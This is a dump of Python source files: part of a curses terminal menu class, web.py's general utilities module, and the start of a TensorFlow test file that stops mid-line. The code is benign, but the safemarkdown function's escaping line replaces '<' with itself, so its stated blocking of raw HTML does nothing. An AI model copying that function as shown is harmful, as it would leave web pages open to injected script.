self.items.append(item) # append new item in menu
if did_remove: # if did remove exit item
self.add_exit() # add exit at end of items
if self.screen: # if screen exists
max_row, max_cols = self.screen.getmaxyx() # get terminal size
if max_row < 6 + len(self.items): # if screen is too small
self.screen.resize(6 + len(self.items), max_cols) # screen resize
self.draw() # draw screen
def add_exit(self):
"""
Add the exit item if necessary. Used to make sure there aren't multiple exit items
:return: True if item needed to be added, False otherwise
:rtype: bool
"""
if self.items: # if items exists
if self.items[-1] is not self.exit_item: # if last item is not exit
self.items.append(self.exit_item) # append exit
return True # return True -
return False
def remove_exit(self):
"""
Remove the exit item if necessary. Used to make sure we only remove the exit item, not something else
:return: True if item needed to be removed, False otherwise
:rtype: bool
"""
if self.items: # if items exists
if self.items[-1] is self.exit_item: # if last item in menu is exit
del self.items[-1] # delete exit from items
return True # return True
return False
def _wrap_start(self): # start wrap menu
if self.parent is None: # if parent is none
curses.wrapper(self._main_loop) # start wrapping main loop menu
else: # if main loop has parent - wrapper
self._main_loop(None) # start mainloop
CursesMenu.currently_active_menu = None # active menu is None
self.clear_screen() # clear screen for rendering
clear_terminal() # clear terminal
CursesMenu.currently_active_menu = self.previous_active_menu # setting menu to previous active
def start(self, show_exit_option=None):
"""
Start the menu in a new thread and allow the user to interact with it.
The thread is a daemon, so :meth:`join()<cursesmenu.CursesMenu.join>` should be called if there's a possibility\
that the main thread will exit before the menu is done
:param bool show_exit_option: Whether the exit item should be shown, defaults to\
the value set in the constructor
"""
self.previous_active_menu = CursesMenu.currently_active_menu # setting previosu active to currently active
CursesMenu.currently_active_menu = None # setting currently active menu as none
self.should_exit = False # setting should exit as False
if show_exit_option is None: # if show exit is none
show_exit_option = self.show_exit_option # set method variable to class variable
if show_exit_option:
self.add_exit() # add exit
else:
self.remove_exit() # remove exit
try: # try start wrapper as new thread
self._main_thread = threading.Thread(target=self._wrap_start, daemon=True) # main threas
except TypeError: # if typeerror is raised
self._main_thread = threading.Thread(target=self._wrap_start) # start new thread
self._main_thread.daemon = True # as a deamon
self._main_thread.start() # thread start
def show(self, show_exit_option=None):
"""
Calls start and then immediately joins.
:param bool show_exit_option: Whether the exit item should be shown, defaults to the value set \
in the constructor
"""
self.start(show_exit_option) # start thread
self.join() # join
def _main_loop(self, scr): # method main loop
if scr is not None: # if screen exists
CursesMenu.stdscr = scr # defines screen as scr parameter
self.screen = curses.newpad(len(self.items) + 6, CursesMenu.stdscr.getmaxyx()[1]) # start newpad plus menu
self._set_up_colors() # setup colors
curses.curs_set(0) # set cursor
CursesMenu.stdscr.refresh() # refresh window
self.draw() # self draw screen
CursesMenu.currently_active_menu = self # ????
self._running.set() # set running
while self._running.wait() is not False and not self.should_exit: #when running wait is True or None and is not exit
self.process_user_input() # waiting for input
def draw(self):
"""
Redraws the menu and refreshes the screen. Should be called whenever something changes that needs to be redrawn.
"""
self.screen.border(0) # setting screen border
if self.title is not None: # if screen title exists
self.screen.addstr(2, 2, self.title, curses.A_STANDOUT) # write it to screen
if self.subtitle is not None: # if subtitle exists
self.screen.addstr(4, 2, self.subtitle, curses.A_BOLD) # write it to screen
for index, item in enumerate(self.items): # index all items in menu
if self.current_option == index: # if current is index
text_style = self.highlight # highlight item
else:
text_style = self.normal # if not current render normal text
self.screen.addstr(5 + index, 4, item.show(index), text_style) # render menu
screen_rows, screen_cols = CursesMenu.stdscr.getmaxyx() # get terminal size
top_row = 0 # firs row is set to zero
if 6 + len(self.items) > screen_rows: # if menu is bigger than terminal
if screen_rows + self.current_option < 6 + len(self.items): # if render is normal
top_row = self.current_option # stays with current setting
else:
top_row = 6 + len(self.items) - screen_rows # ???
self.screen.refresh(top_row, 0, 0, 0, screen_rows - 1, screen_cols - 1) # screen refresh
def is_running(self):
"""
:return: True if the menu is started and hasn't been paused
"""
return self._running.is_set() # checks if menu is runnig
def wait_for_start(self, timeout=None):
"""
Block until the menu is started
:param timeout: How long to wait before timing out
:return: False if timeout is given and operation times out, True otherwise. None before Python 2.7
"""
return self._running.wait(timeout) # waits to restart of menu
def is_alive(self):
"""
:return: True if the thread is still alive, False otherwise
"""
return self._main_thread.is_alive() # checks if main thread is alive
def pause(self):
"""
Temporarily pause the menu until resume is called
"""
self._running.clear() # pause menu until resume
def resume(self):
"""
Sets the currently active menu to this one and resumes it
"""
CursesMenu.currently_active_menu = self # sets currently active to self (object)
self._running.set() # set running
def join(self, timeout=None):
"""
Should be called at some point after :meth:`start()<cursesmenu.CursesMenu.start>` to block until the menu exits.
:param Number timeout: How long to wait before timing out
"""
self._main_thread.join(timeout=timeout) # join main thread
def get_input(self):
"""
Can be overridden to change the input method.
Called in :meth:`process_user_input()<cursesmenu.CursesMenu.process_user_input>`
:return: the ordinal value of a single character
:rtype: int
"""
return CursesMenu.stdscr.getch() # get input from user
def process_user_input(self):
"""
Gets the next single character and decides what to do with it
"""
user_input = self.get_input() # define user input as get input
go_to_max = ord("9") if len(self.items) >= 9 else ord(str(len(self.items))) # max value is 9 items ???
if ord('1') <= user_input <= go_to_max: # if user enters number go there in menu
self.go_to(user_input - ord('0') - 1) # go there
elif user_input == curses.KEY_DOWN: # if user gives KEY DOWN go down by 1
self.go_down()
elif user_input == curses.KEY_UP: # if user gives KEY UP go up by 1
self.go_up()
elif user_input == ord("\n"): # if user gives ENTER select and execute
self.select()
return user_input # return user input
def go_to(self, option):
"""
Go to the option entered by the user as a number
:param option: the option to go to
:type option: int
"""
self.current_option = option
self.draw()
def go_down(self):
"""
Go down one, wrap to beginning if necessary
"""
if self.current_option < len(self.items) - 1:
self.current_option += 1
else:
self.current_option = 0
self.draw()
def go_up(self):
"""
Go up one, wrap to end if necessary
"""
if self.current_option > 0:
self.current_option += -1
else:
self.current_option = len(self.items) - 1
self.draw()
def select(self):
"""
Select the current item and run it
"""
self.selected_option = self.current_option
self.selected_item.set_up()
self.selected_item.action()
self.selected_item.clean_up()
self.returned_value = self.selected_item.get_return()
self.should_exit = self.selected_item.should_exit
if not self.should_exit:
self.draw()
def exit(self):
"""
Signal the menu to exit, then block until it's done cleaning up
"""
self.should_exit = True
self.join()
def _set_up_colors(self):
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
self.highlight = curses.color_pair(1)
self.normal = curses.A_NORMAL
def clear_screen(self):
"""
Clear the screen belonging to this menu
"""
self.screen.clear()
class MenuItem(object):
"""
A generic menu item
"""
def __init__(self, text, menu=None, should_exit=False):
"""
:ivar str text: The text shown for this menu item
:ivar CursesMenu menu: The menu to which this item belongs
:ivar bool should_exit: Whether the menu should exit once this item's action is done
"""
self.text = text
self.menu = menu
self.should_exit = should_exit
def __str__(self):
return "%s %s" % (self.menu.title, self.text)
def show(self, index):
"""
How this item should be displayed in the menu. Can be overridden, but should keep the same signature.
Default is:
1 - Item 1
2 - Another Item
:param int index: The index of the item in the items list of the menu
:return: The representation of the item to be shown in a menu
:rtype: str
"""
return "%d - %s" % (index + 1, self.text)
def set_up(self):
"""
Override to add any setup actions necessary for the item
"""
pass
def action(self):
"""
Override to carry out the main action for this item.
"""
pass
def clean_up(self):
"""
Override to add any cleanup actions necessary for the item
"""
pass
def get_return(self):
"""
Override to change what the item returns.
Otherwise just returns the same value the last selected item did.
"""
return self.menu.returned_value
class ExitItem(MenuItem):
"""
Used to exit the current menu. Handled by :class:`cursesmenu.CursesMenu`
"""
def __init__(self, text="Exit", menu=None):
super(ExitItem, self).__init__(text=text, menu=menu, should_exit=True)
def show(self, index):
"""
This class overrides this method
"""
if self.menu and self.menu.parent:
self.text = "Return to %s menu" % self.menu.parent.title
else:
self.text = "Exit"
return super(ExitItem, self).show(index)
def clear_terminal():
"""
Call the platform specific function to clear the terminal: cls on windows, reset otherwise
"""
if platform.system().lower() == "windows":
os.system('cls')
else:
os.system('reset')
|
utils.py | #!/usr/bin/env python
"""
General Utilities
(part of web.py)
"""
__all__ = [
"Storage", "storage", "storify",
"iters",
"rstrips", "lstrips", "strips",
"safeunicode", "safestr", "utf8",
"TimeoutError", "timelimit",
"Memoize", "memoize",
"re_compile", "re_subm",
"group",
"IterBetter", "iterbetter",
"dictreverse", "dictfind", "dictfindall", "dictincr", "dictadd",
"listget", "intget", "datestr",
"numify", "denumify", "commify", "dateify",
"nthstr",
"CaptureStdout", "capturestdout", "Profile", "profile",
"tryall",
"ThreadedDict", "threadeddict",
"autoassign",
"to36",
"safemarkdown",
"sendmail"
]
import re, sys, time, threading, itertools
try:
import subprocess
except ImportError:
subprocess = None
try: import datetime
except ImportError: pass
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError, k:
raise AttributeError, k
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError, k:
raise AttributeError, k
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
d doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
def unicodify(s):
if _unicode and isinstance(s, str): return safeunicode(s)
else: return s
def getvalue(x):
if hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
iters.append(set)
if hasattr(__builtin__, 'frozenset'):
iters.append(set)
if sys.version_info < (2,6): # sets module deprecated in 2.6
try:
from sets import Set
iters.append(Set)
except ImportError:
pass
class _hack(tuple): pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""
removes the string `remove` from the right of `text`
>>> rstrips("foobar", "bar")
'foo'
"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""
removes the string `remove` from the left of `text`
>>> lstrips("foobar", "foo")
'bar'
"""
return _strips('l', text, remove)
def strips(text, remove):
"""
removes the string `remove` from the both sides of `text`
>>> strips("foobarfoo", "foo")
'bar'
"""
return rstrips(lstrips(text, remove), remove)
def safeunicode(obj, encoding='utf-8'):
r"""
Converts any given object to unicode string.
>>> safeunicode('hello')
u'hello'
>>> safeunicode(2)
u'2'
>>> safeunicode('\xe1\x88\xb4')
u'\u1234'
"""
if isinstance(obj, unicode):
return obj
elif isinstance(obj, str):
return obj.decode(encoding)
else:
if hasattr(obj, '__unicode__'):
return unicode(obj)
else:
return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
r"""
Converts any given object to utf-8 encoded string.
>>> safestr('hello')
'hello'
>>> safestr(u'\u1234')
'\xe1\x88\xb4'
>>> safestr(2)
'2'
"""
if isinstance(obj, unicode):
return obj.encode('utf-8')
elif isinstance(obj, str):
return obj
elif hasattr(obj, 'next'): # iterator
return itertools.imap(safestr, obj)
else:
return str(obj)
# for backward-compatibility
utf8 = safestr
class TimeoutError(Exception): pass
def timelimit(timeout):
"""
A decorator to limit a function to `timeout` seconds, raising `TimeoutError`
if it takes longer.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>>
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> timelimit(1)(meaningoflife)()
42
_Caveat:_ The function isn't stopped after `timeout` seconds but continues
executing in a separate thread. (There seems to be no way to kill a thread.)
inspired by <http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878>
"""
def _1(function):
def _2(*args, **kw):
class Dispatch(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
self.error = None
self.setDaemon(True)
self.start()
def run(self):
try:
self.result = function(*args, **kw)
except:
self.error = sys.exc_info()
c = Dispatch()
c.join(timeout)
if c.isAlive():
raise TimeoutError, 'took too long'
if c.error:
raise c.error[0], c.error[1]
return c.result
return _2
return _1
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>> fastlife = memoize(meaningoflife)
>>> meaningoflife()
42
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> fastlife()
42
>>> timelimit(.1)(fastlife)()
42
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args, **keywords):
key = (args, tuple(keywords.items()))
if key not in self.cache:
self.cache[key] = self.func(*args, **keywords)
return self.cache[key]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""
Like re.sub, but returns the replacement _and_ the match object.
>>> t, m = re_subm('g(oo+)fball', r'f\\1lish', 'goooooofball')
>>> t
'foooooolish'
>>> m.groups()
('oooooo',)
"""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
"""
if not hasattr(seq, 'next'):
seq = iter(seq)
while True:
yield [seq.next() for i in xrange(size)]
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
>>> import itertools
>>> c = iterbetter(itertools.count())
>>> c[1]
1
>>> c[5]
5
>>> c[3]
Traceback (most recent call last):
...
IndexError: already passed 3
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i < self.c:
raise IndexError, "already passed "+str(i)
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
iterbetter = IterBetter
def dictreverse(mapping):
"""
Returns a new dictionary with keys and values swapped.
>>> dictreverse({1: 2, 3: 4})
{2: 1, 4: 3}
"""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
>>> d = {1:2, 3:4}
>>> dictfind(d, 4)
3
>>> dictfind(d, 5)
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
>>> d = {1:4, 3:4}
>>> dictfindall(d, 4)
[1, 3]
>>> dictfindall(d, 5)
[]
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
>>> d = {1:2, 3:4}
>>> dictincr(d, 1)
3
>>> d[1]
3
>>> dictincr(d, 5)
1
>>> d[5]
1
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(*dicts):
"""
Returns a dictionary consisting of the keys in the argument dictionaries.
If they share a key, the value from the last argument is used.
>>> dictadd({1: 0, 2: 0}, {2: 1, 3: 1})
{1: 0, 2: 1, 3: 1}
"""
result = {}
for dct in dicts:
result.update(dct)
return result
def listget(lst, ind, default=None):
"""
Returns `lst[ind]` if it exists, `default` otherwise.
>>> listget(['a'], 0)
'a'
>>> listget(['a'], 1)
>>> listget(['a'], 1, 'b')
'b'
"""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""
Returns `integer` as an int or `default` if it can't.
>>> intget('3')
3
>>> intget('3a')
>>> intget('3a', 0)
0
"""
try:
return int(integer)
except (TypeError, ValueError):
return default
def datestr(then, now=None):
"""
Converts a (UTC) datetime object to a nice string representation.
>>> from datetime import datetime, timedelta
>>> d = datetime(1970, 5, 1)
>>> datestr(d, now=d)
'0 microseconds ago'
>>> for t, v in {
... timedelta(microseconds=1): '1 microsecond ago',
... timedelta(microseconds=2): '2 microseconds ago',
... -timedelta(microseconds=1): '1 microsecond from now',
... -timedelta(microseconds=2): '2 microseconds from now',
... timedelta(microseconds=2000): '2 milliseconds ago',
... timedelta(seconds=2): '2 seconds ago',
... timedelta(seconds=2*60): '2 minutes ago',
... timedelta(seconds=2*60*60): '2 hours ago',
... timedelta(days=2): '2 days ago',
... }.iteritems():
... assert datestr(d, now=d+t) == v
>>> datestr(datetime(1970, 1, 1), now=d)
'January 1'
>>> datestr(datetime(1969, 1, 1), now=d)
'January 1, 1969'
>>> datestr(datetime(1970, 6, 1), now=d)
'June 1, 1970'
"""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not now: now = datetime.datetime.utcnow()
if type(now).__name__ == "DateTime":
now = datetime.datetime.fromtimestamp(now)
if type(then).__name__ == "DateTime":
then = datetime.datetime.fromtimestamp(then)
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
def numify(string):
"""
Removes all non-digit characters from `string`.
>>> numify('800-555-1212')
'8005551212'
>>> numify('800.555.1212')
'8005551212'
"""
return ''.join([c for c in str(string) if c.isdigit()])
def denumify(string, pattern):
"""
Formats `string` according to `pattern`, where the letter X gets replaced
by characters from `string`.
>>> denumify("8005551212", "(XXX) XXX-XXXX")
'(800) 555-1212'
"""
out = []
for c in pattern:
if c == "X":
out.append(string[0])
string = string[1:]
else:
out.append(c)
return ''.join(out)
def commify(n):
"""
Add commas to an integer `n`.
>>> commify(1)
'1'
>>> commify(123)
'123'
>>> commify(1234)
'1,234'
>>> commify(1234567890)
'1,234,567,890'
>>> commify(None)
>>>
"""
if n is None: return None
r = []
for i, c in enumerate(reversed(str(n))):
if i and (not (i % 3)):
r.insert(0, ',')
r.insert(0, c)
return ''.join(r)
def dateify(datestring):
"""
Formats a numified `datestring` properly.
"""
return denumify(datestring, "XXXX-XX-XX XX:XX:XX")
def nthstr(n):
"""
Formats an ordinal.
Doesn't handle negative numbers.
>>> nthstr(1)
'1st'
>>> nthstr(0)
'0th'
>>> [nthstr(x) for x in [2, 3, 4, 5, 10, 11, 12, 13, 14, 15]]
['2nd', '3rd', '4th', '5th', '10th', '11th', '12th', '13th', '14th', '15th']
>>> [nthstr(x) for x in [91, 92, 93, 94, 99, 100, 101, 102]]
['91st', '92nd', '93rd', '94th', '99th', '100th', '101st', '102nd']
>>> [nthstr(x) for x in [111, 112, 113, 114, 115]]
['111th', '112th', '113th', '114th', '115th']
"""
assert n >= 0
if n % 100 in [11, 12, 13]: return '%sth' % n
return {1: '%sst', 2: '%snd', 3: '%srd'}.get(n % 10, '%sth') % n
def cond(predicate, consequence, alternative=None):
"""
Function replacement for if-else to use in expressions.
>>> x = 2
>>> cond(x % 2 == 0, "even", "odd")
'even'
>>> cond(x % 2 == 0, "even", "odd") + '_row'
'even_row'
"""
if predicate:
return consequence
else:
return alternative
class CaptureStdout:
"""
Captures everything `func` prints to stdout and returns it instead.
>>> def idiot():
... print "foo"
>>> capturestdout(idiot)()
'foo\\n'
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
>>> import time
>>> out, inf = profile(time.sleep)(.001)
>>> out
>>> inf[:10].strip()
'took 0.0'
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, tempfile ##, time already imported
temp = tempfile.NamedTemporaryFile()
prof = hotshot.Profile(temp.name)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
import cStringIO
out = cStringIO.StringIO()
stats = hotshot.stats.load(temp.name)
stats.stream = out
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(40)
stats.print_callers()
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += out.getvalue()
return result, x
profile = Profile
import traceback
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
>>> tryall(dict(j=lambda: True))
j: True
----------------------------------------
results:
True: 1
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict:
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
def __getattr__(self, key):
return getattr(self._getd(), key)
def __setattr__(self, key, value):
return setattr(self._getd(), key, value)
def __delattr__(self, key):
return delattr(self._getd(), key)
def __hash__(self):
return id(self)
def _getd(self):
t = threading.currentThread()
if not hasattr(t, '_d'):
# using __dict__ of thread as thread local storage
t._d = {}
# there could be multiple instances of ThreadedDict.
# use self as key
if self not in t._d:
t._d[self] = storage()
return t._d[self]
threadeddict = ThreadedDict
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
>>> self = storage()
>>> autoassign(self, dict(a=1, b=2))
>>> self
<Storage {'a': 1, 'b': 2}>
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
def to36(q):
"""
Converts an integer to base 36 (a useful scheme for human-sayable IDs).
>>> to36(35)
'z'
>>> to36(119292)
'2k1o'
>>> int(to36(939387374), 36)
939387374
>>> to36(0)
'0'
>>> to36(-393)
Traceback (most recent call last):
...
ValueError: must supply a positive integer
"""
if q < 0: raise ValueError, "must supply a positive integer"
letters = "0123456789abcdefghijklmnopqrstuvwxyz"
converted = []
while q != 0:
q, r = divmod(q, 36)
converted.insert(0, letters[r])
return "".join(converted) or '0'
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
from markdown import markdown
if text:
text = text.replace('<', '<')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
def sendmail(from_address, to_address, subject, message, headers=None, **kw):
"""
Sends the email message `message` with mail and envelope headers
for from `from_address_` to `to_address` with `subject`.
Additional email headers can be specified with the dictionary
`headers.
If `web.config.smtp_server` is set, it will send the message
to that SMTP server. Otherwise it will look for
`/usr/sbin/sendmail`, the typical location for the sendmail-style
binary. To use sendmail from a different path, set `web.config.sendmail_path`.
"""
try:
import webapi
except ImportError:
webapi = Storage(config=Storage())
if headers is None: headers = {}
cc = kw.get('cc', [])
bcc = kw.get('bcc', [])
def listify(x):
if not isinstance(x, list):
return [safestr(x)]
else:
return [safestr(a) for a in x]
from_address = safestr(from_address)
to_address = listify(to_address)
cc = listify(cc)
bcc = listify(bcc)
recipients = to_address + cc + bcc
headers = dictadd({
'MIME-Version': '1.0',
'Content-Type': 'text/plain; charset=UTF-8',
'Content-Disposition': 'inline',
'From': from_address,
'To': ", ".join(to_address),
'Subject': subject
}, headers)
if cc:
headers['Cc'] = ", ".join(cc)
import email.Utils
from_address = email.Utils.parseaddr(from_address)[1]
recipients = [email.Utils.parseaddr(r)[1] for r in recipients]
message = ('\n'.join([safestr('%s: %s' % x) for x in headers.iteritems()])
+ "\n\n" + safestr(message))
if webapi.config.get('smtp_server'):
server = webapi.config.get('smtp_server')
port = webapi.config.get('smtp_port', 0)
username = webapi.config.get('smtp_username')
password = webapi.config.get('smtp_password')
debug_level = webapi.config.get('smtp_debuglevel', None)
starttls = webapi.config.get('smtp_starttls', False)
import smtplib
smtpserver = smtplib.SMTP(server, port)
if debug_level:
smtpserver.set_debuglevel(debug_level)
if starttls:
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
if username and password:
smtpserver.login(username, password)
smtpserver.sendmail(from_address, recipients, message)
smtpserver.quit()
else:
sendmail = webapi.config.get('sendmail_path', '/usr/sbin/sendmail')
assert not from_address.startswith('-'), 'security'
for r in recipients:
assert not r.startswith('-'), 'security'
if subprocess:
p = subprocess.Popen(['/usr/sbin/sendmail', '-f', from_address] + recipients, stdin=subprocess.PIPE)
p.stdin.write(message)
p.stdin.close()
p.wait()
else:
i, o = os.popen2(["/usr/lib/sendmail", '-f', from_address] + recipients)
i.write(message)
i.close()
o.close()
del i, o
if __name__ == "__main__":
import doctest
doctest.testmod()
|
test_util_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase, parameterized.TestCase):
@test_util.run_deprecated_v1
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
